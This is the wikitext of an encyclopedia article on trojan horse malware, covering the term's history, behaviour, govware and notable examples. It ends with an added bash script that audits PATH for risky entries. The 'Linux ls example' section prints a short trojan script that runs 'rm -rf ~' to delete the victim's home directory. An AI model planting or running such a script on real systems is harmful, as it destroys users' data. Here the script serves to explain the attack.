Trojan horse (computing)
{{Short description|Type of malware}}
{{About|the type of malware|the wooden horse in Greek mythology|Trojan Horse|other uses|Trojan Horse (disambiguation)}}
{{Use mdy dates|date=May 2018}}
{{Computer hacking}}
In [[computing]], a '''trojan horse''' (or simply '''trojan''';<ref name="Collins2020"/> often capitalized,<ref name="Gregg2015"/> but see below) is a kind of [[malware]] that misleads users as to its true intent by disguising itself as a normal program.

Trojans are generally spread by some form of [[social engineering (security)|social engineering]]. For example, a user may be duped into executing an [[email]] attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking on a fake advertisement on the [[Internet]]. Although their payload can be anything, many modern forms act as a [[backdoor (computing)|backdoor]], contacting a controller who can then have unauthorized access to the affected device.<ref name="Broadcom2013"/> [[Ransomware]] attacks are often carried out using a trojan.

Unlike [[computer virus]]es and [[Computer worm|worms]], trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.<ref>{{Cite web |title = VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)
|url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html |date = October 9, 1995 |access-date = September 16, 2019 |archive-date = August 5, 2020 |archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html |url-status = dead}}</ref>

==Origins of the term==
The term is derived from the [[Ancient Greece|ancient Greek]] story of the deceptive [[Trojan Horse]] that led to the fall of the city of [[Troy]].<ref name="Gregg2015"/>

It is unclear where and when the computing concept, and this term for it, originated; but by 1971 the first [[Unix]] manual assumed its readers knew both.<ref>{{cite web |last1=Thompson |first1=Ken |last2=Ritchie |first2=Dennis M. |title=Unix Programmer's Manual, November 3, 1971 |url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |page = 5 |quote = Also, one may not change the owner of a file with the set-user-ID bit on, otherwise one could create Trojan Horses able to misuse other's files. |access-date=28 March 2020}}</ref> Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the [[Multics]] computer systems.<ref name="Karger1974"/>

The term "Trojan horse" was popularized by [[Ken Thompson]] in his 1983 [[Turing Award]] acceptance lecture "Reflections on Trusting Trust",<ref name="Thompson1984"/> subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of trojans from a report on the security of Multics.<ref name="Karger2002"/><ref>Karger and Schell wrote that Thompson added this reference in a later version of his Turing conference speech: {{Citation|author = Ken Thompson|title = On Trusting Trust.
|journal = Unix Review|date = November 1989|volume = 7|number = 11|pages = 70–74}}</ref>

===Capitalization===
The computer term "Trojan horse" is derived from the legendary [[Trojan Horse]] of the ancient city of [[Troy]]. For this reason "Trojan" is often capitalized, especially in older sources. However, many modern [[style guide]]s<ref name="Microsoft2020"/> and dictionaries<ref name="Collins2020"/> suggest a lower-case "trojan" for this technical use.

==Behavior==
Once installed, trojans may perform a range of malicious actions. Many tend to contact one or more [[Botnet#Command and control|Command and Control]] (C2) servers across the Internet and await instruction. Since individual trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the trojan, using it as a proxy for malicious action.<ref name="Crapanzano2003"/>

In German-speaking countries, [[spyware]] used or made by the government is sometimes called ''govware''. Govware is typically used to intercept communications from the target device. Some countries like Switzerland and Germany have a legal framework governing the use of such software.<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp.
419–428</ref><ref>{{cite web |url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html |title=Häufig gestellte Fragen (Frequently Asked Questions)| publisher=Federal Department of Justice and Police |url-status=dead |archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> Examples of govware trojans include the Swiss [[MiniPanzer and MegaPanzer]]<ref name="tech">{{cite web |last1=Dunn |first1=John |title=Swiss coder publicises government spy Trojan |url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/ |website=[[International Data Group|TechWorld]] |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/ |archive-date=26 January 2014 |date=27 August 2009 |url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> and the [[Staatstrojaner|German "state trojan" nicknamed R2D2]].<ref name="cupa"/> German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.<ref>{{Cite web |title = German federal police use trojan virus to evade phone encryption |url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466 |website = [[Deutsche Welle|DW]] |access-date = 2018-04-14}}</ref>

Due to the popularity of [[Botnet|botnets]] among hackers and the availability of advertising services that permit authors to violate their users' privacy, trojans are becoming more common. According to a survey conducted by [[Bitdefender|BitDefender]] from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world."
Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.<ref name="Bitdefender2009"/> BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a trojan infection.<ref name="Datta2014"/>

Recent investigations have revealed that the trojan-horse method has been used as an attack on [[cloud computing]] systems. A trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping their functionality. If the cloud system accepts the inserted application or service as legitimate, it is executed, which can damage and infect the cloud system.<ref>{{Cite journal |last1=Kanaker |first1=Hasan |last2=Karim |first2=Nader Abdel |last3=Awwad |first3=Samer A. B. |last4=Ismail |first4=Nurul H. A. |last5=Zraqou |first5=Jamal |last6=Ali |first6=Abdulla M. F. Al |date=2022-12-20 |title=Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning |url=https://online-journals.org/index.php/i-jim/article/view/35763 |journal=International Journal of Interactive Mobile Technologies |language=en |volume=16 |issue=24 |pages=81–106 |doi=10.3991/ijim.v16i24.35763 |issn=1865-7923|doi-access=free }}</ref>

==Linux ls example==
A trojan horse is a [[Computer program|program]] that purports to perform some legitimate function, yet upon execution it compromises the user's security.<ref name="Wood1985"/> One simple example<ref name="CETS2023"/> is the following malicious version of the Linux [[ls]] command. An attacker would place this executable script in a publicly writable and "high-traffic" location (e.g., <code>/tmp/ls</code>).
Then, any victim who tried to run <code>ls</code> from that directory – ''if and only if'' the victim's executable search <code>PATH</code> unwisely<ref name="CETS2023"/> included the current directory <code>.</code> – would execute <code>/tmp/ls</code> instead of <code>/usr/bin/ls</code>, and have their home directory deleted.

<syntaxhighlight lang="sh">
#!/usr/bin/env bash

rm -rf ~ 2>/dev/null  # Remove the user's home directory, then remove self.
rm $0
</syntaxhighlight>

Similar scripts could hijack other common commands; for example, a script purporting to be the [[sudo]] command (which prompts for the user's password) could instead mail that password to the attacker.<ref name="Wood1985"/>

In these examples, the malicious program imitates the name of a well-known useful program, rather than pretending to be a novel and unfamiliar (but harmless) program. As such, these examples also resemble [[typosquatting]] and [[supply chain attack]]s.

==Notable examples==

===Private and governmental===
* [[ANOM]] – FBI
* [[Chaos Computer Club#Staatstrojaner affair|0zapftis / r2d2 StaatsTrojaner]] – DigiTask
* [[FinFisher]] – Lench IT solutions / Gamma International
* [[Hacking Team#Products and capabilities|DaVinci / Galileo RCS]] – HackingTeam
* [[Magic Lantern (spyware)|Magic Lantern]] – FBI
* [[2020 United States federal government data breach|SUNBURST]] – [[Foreign Intelligence Service (Russia)|SVR]]/[[Cozy Bear]] (suspected)
* [[Tailored Access Operations#QUANTUM attacks|TAO QUANTUM/FOXACID]] – NSA
* [[WARRIOR PRIDE]] – GCHQ

===Publicly available===
* [[EGABTR]] – late 1980s
* [[Netbus]] – 1998 (published)<ref name="Kulakow2001"/>
* [[Sub7]] by Mobman – 1999 (published)
* [[Back Orifice]] – 1998 (published)
* [[Y3K]] by Tselentis brothers – 2000 (published)
* [[Beast (Trojan horse)|Beast]] – 2002 (published)
* [[Bifrost (Trojan horse)|Bifrost Trojan]] – 2004 (published)
* [[DarkComet]] – 2008-2012 (published)
* [[Blackhole exploit kit]] – 2012 (published)
* [[Gh0st RAT]]
– 2009 (published)
* [[MiniPanzer and MegaPanzer|MegaPanzer BundesTrojaner]] – 2009 (published)<ref name="MegaPanzer2016"/><ref name="MiniPanzer2016"/>
* [[MEMZ]] by Leurak – 2016 (published)

===Detected by security researchers===
* [[Twelve Tricks]] – 1990
* [[Clickbot.A]] – 2006 (discovered)
* [[Zeus (Trojan horse)|Zeus]] – 2007 (discovered)
* [[Trojan BackDoor.Flashback|Flashback Trojan]] – 2011 (discovered)
* [[ZeroAccess botnet|ZeroAccess]] – 2011 (discovered)
* [[Koobface]] – 2008 (discovered)
* [[Vundo]] – 2009 (discovered)
* [[Coreflood]] – 2010 (discovered)
* [[Tiny Banker Trojan]] – 2012 (discovered)
* [[Wirelurker]] - 2014 (discovered)
* [[Shedun]] (Android malware) – 2015 (discovered)<ref name="Lookout2015"/><ref name="Neal2015"/><ref name="Bentley2015"/><ref>{{cite web |url=https://betanews.com/2015/11/05/shuanet-shiftybug-and-shedun-malware-could-auto-root-your-android/ |title=Shuanet, ShiftyBug and Shedun malware could auto-root your Android |date=November 5, 2015}}</ref><ref>{{cite web |url=http://www.techtimes.com/articles/104373/20151109/new-family-of-android-malware-virtually-impossible-to-remove-say-hello-to-shedun-shuanet-and-shiftybug.htm |title=New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug |first=Tech |last=Times |date=November 9, 2015}}</ref><ref>{{cite web |url=https://arstechnica.com/security/2015/11/android-adware-can-install-itself-even-when-users-explicitly-reject-it/ |title=Android adware can install itself even when users explicitly reject it |date=2015-11-19}}</ref>

==See also==
{{colbegin}}
* {{annotated link|Computer security}}
* {{annotated link|Cuckoo's egg (metaphor)}}
* {{annotated link|Cyber spying}}
* {{annotated link|Dancing pigs}}
* {{annotated link|Exploit (computer security)}}
* {{annotated link|Industrial espionage}}
* {{annotated link|Hardware Trojan}}
* {{annotated link|Phishing}}
* {{annotated link|Principle of least privilege}}
* {{annotated
link|Privacy-invasive software}}
* {{annotated link|Remote administration}}
* {{annotated link|Remote administration software}}
* {{annotated link|Reverse connection}}
* {{annotated link|Rogue security software}}
* {{annotated link|Scammers}}
* {{annotated link|Technical support scam}}
* {{annotated link|Timeline of computer viruses and worms}}
* {{annotated link|Zombie (computer science)}}
{{colend}}

==References==
<references>
<ref name="Bentley2015">{{cite web |author=Michael Bentley |title=Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire |website=blog.lookout.com |url=https://blog.lookout.com/blog/2015/11/04/trojanized-adware/ |access-date=2016-04-08 |url-status=dead |archive-url=https://web.archive.org/web/20170219042903/https://blog.lookout.com/blog/2015/11/04/trojanized-adware/ |archive-date=2017-02-19}}</ref>
<ref name="Bitdefender2009">{{cite web |title=BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends |date=2009-08-03 |website=[[Bitdefender|BitDefender]] |url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |access-date=2020-03-27 |url-status=dead |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08}}</ref>
<ref name="Broadcom2013">{{cite web |title=Difference between viruses, worms, and trojans |url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc.
|access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}{{cbignore|bot=InternetArchiveBot}}</ref>
<ref name="CETS2023">{{cite web |url=https://cets.seas.upenn.edu/answers/dot-path.html |title=What's wrong with having '.' in your $PATH? |website=CETS Answers |publisher=University of Pennsylvania Computing and Educational Technology Services |access-date=2023-11-28}}</ref>
<ref name="Collins2020">{{cite web |title=trojan |url=https://www.collinsdictionary.com/dictionary/english/trojan |website=Collins Advanced Dictionary |access-date=2020-03-29}}</ref>
<ref name="Crapanzano2003">{{cite report |author=Jamie Crapanzano |title=Deconstructing SubSeven, the Trojan Horse of Choice |date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>
<ref name="Datta2014">{{cite web |author=Ganesh Datta |title=What are Trojans? |url=http://securaid.com/windows/2014/08/what-are-trojans/ |work=SecurAid |archive-url=https://archive.today/20140812015643/http://securaid.com/windows/2014/08/what-are-trojans/ |archive-date=2014-08-12 |url-status=dead |date=2014-08-07 |access-date=2020-03-27}}</ref>
<ref name="Gregg2015">{{cite book |author=Michael Gregg |title=The Network Security Test Lab: A Step-by-Step Guide |entry=Backdoors and Trojans |publisher=Wiley |year=2015 |pages=338–340 |isbn=978-1-118-98705-6 |url=https://archive.org/details/networksecurityt0000greg/page/338 |access-date=2020-03-29 |quote=Unlike a virus or worm, Trojans cannot spread themselves.}}</ref>
<ref name="Karger1974">{{cite journal |author1=Paul A. Karger |author2=Roger R.
Schell |title=Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193 |journal=HQ Electronic Systems Division: Hanscom AFB, MA |volume=2 |date=June 1974 |url=http://csrc.nist.gov/publications/history/karg74.pdf |access-date=2017-12-24 |archive-url=https://web.archive.org/web/20110709024412/http://csrc.nist.gov/publications/history/karg74.pdf |archive-date=2011-07-09 |url-status=dead |at=4.2.1 |quote=...some sort of protection from user written applications programs that may contain "Trojan Horses" {{sic}}}}</ref>
<ref name="Karger2002">{{cite journal |author1=Paul A. Karger |author2=Roger R. Schell |title=Thirty Years Later: Lessons from the Multics Security Evaluation |journal=ACSAC |date=2002 |pages=119–126 |url=https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref>
<ref name="Kulakow2001">{{cite report |author=Seth Kulakow |title=NetBus 2.1: Is It Still a Trojan Horse or an Actual Valid Remote Control Administration Tool? |url=https://www.sans.org/reading-room/whitepapers/malicious/netbus-21-trojan-horse-actual-valid-remote-control-administration-tool-103 |publisher=[[SANS Institute]] |date=2001 |access-date=2021-05-10 |url-status=dead}}</ref>
<ref name="Lookout2015">{{cite web |title=Trojanized Adware Family Abuses Accessibility Service |website=Lookout.com |date=2015-11-19 |url=https://blog.lookout.com/blog/2015/11/19/shedun-trojanized-adware/}}</ref>
<ref name="MegaPanzer2016">{{cite web |author=orbitalsatelite |title=Mega-Panzer |website=SourceForge |date=2016-09-21 |url=https://sourceforge.net/projects/mega-panzer/}}</ref>
<ref name="Microsoft2020">{{cite encyclopedia |entry=trojan horse |title=Microsoft Style Guide |publisher=[[Microsoft]] |url=https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/t/trojan-horse-trojan |access-date=2020-03-29}}</ref>
<ref name="MiniPanzer2016">{{cite web |author=orbitalsatelite |title=Mini-Panzer |website=SourceForge |date=2016-09-18
|url=https://sourceforge.net/projects/mini-panzer/}}</ref>
<ref name="Neal2015">{{cite web |author=[[Dave Neal]] |title=Shedun trojan adware is hitting the Android Accessibility Service |date=2015-11-20 |url=http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |website=[[The Inquirer]] |publisher=Incisive Business Media |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20151122002729/http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |archive-date=2015-11-22 |url-status=unfit}}</ref>
<ref name="Thompson1984">{{cite journal |title=Reflections on Trusting Trust |author=[[Ken Thompson]] |journal=[[Communications of the ACM]] |volume=27 |number=8 |pages=761–763 |date=1984 |url=https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf |doi=10.1145/358198.358210 |doi-access=free}}</ref>
<ref name="Wood1985">{{cite book |author1=Patrick H. Wood |author2=Stephen G. Kochan |title=UNIX System Security |publisher=Hayden Books |year=1985 |pages=42–43 |isbn=0-8104-6267-2}}</ref>
</references>

==Notes==
{{Notelist}}

==External links==
*{{Commonscatinline|Trojan horse (malware)}}
*{{cite web |title=CERT Advisory CA-1999-02 Trojan Horses |url=https://resources.sei.cmu.edu/asset_files/WhitePaper/1999_019_001_496184.pdf#page=14 |website=Carnegie Mellon University Software Engineering Institute |archive-url=https://web.archive.org/web/20001017172300/http://www.cert.org/advisories/CA-1999-02.html |archive-date=2000-10-17 |access-date=15 September 2019 |url-status=live}}

{{Malware}}
{{Information security}}
{{Software distribution}}
{{Authority control}}

{{DEFAULTSORT:Trojan Horse (Computing)}}
[[Category:Trojan horses| ]]
[[Category:Social engineering (security)]]
[[Category:Spyware]]
[[Category:Cyberwarfare]]
[[Category:Security breaches]]
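
The precondition named in the "Linux ls example" section (a search <code>PATH</code> that includes the current directory, or a publicly writable directory such as <code>/tmp</code>) can be checked for directly. The script below is an added example, not part of the article or of its cited sources; the function names <code>audit_path</code> and <code>first_match</code> and the finding labels are hypothetical, chosen for this illustration.

```shell
#!/usr/bin/env bash
# Added example: audit a PATH value for entries that let a planted file such
# as /tmp/ls run in place of /usr/bin/ls.

# audit_path PATH_STRING
# Prints one "<kind>:<entry>" line per risky entry; returns 1 if any was found.
audit_path() {
    local rest="${1}:" entry found=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first colon
        rest=${rest#*:}     # drop that entry and its colon
        case $entry in
            "") echo "empty:"; found=1 ;;   # leading, trailing or doubled colon means "."
            .)  echo "dot:."; found=1 ;;
            /*) # Absolute entry: risky when any local user can create files in it.
                if [ -n "$(find "$entry" -maxdepth 0 -type d -perm -0002 2>/dev/null)" ]; then
                    echo "world-writable:$entry"; found=1
                fi ;;
            *)  echo "relative:$entry"; found=1 ;;   # resolved against the current directory
        esac
    done
    return "$found"
}

# first_match COMMAND PATH_STRING [CWD]
# Prints the file that PATH lookup would pick for COMMAND when run from CWD
# (default: the current directory), trying entries left to right.
first_match() {
    local cmd="$1" rest="${2}:" cwd="${3:-$PWD}" entry dir
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case $entry in
            ""|.) dir=$cwd ;;
            /*)   dir=$entry ;;
            *)    dir=$cwd/$entry ;;
        esac
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            echo "$dir/$cmd"
            return 0
        fi
    done
    return 1
}

# Audit the live environment, then show which file "ls" resolves to.
audit_path "$PATH" || echo "PATH contains risky entries (listed above)" >&2
first_match ls "$PATH" || echo "ls not found on PATH" >&2
```

An empty entry is reported separately from <code>.</code> because a stray leading, trailing or doubled colon has the same effect as listing the current directory and is easy to overlook when reading the variable.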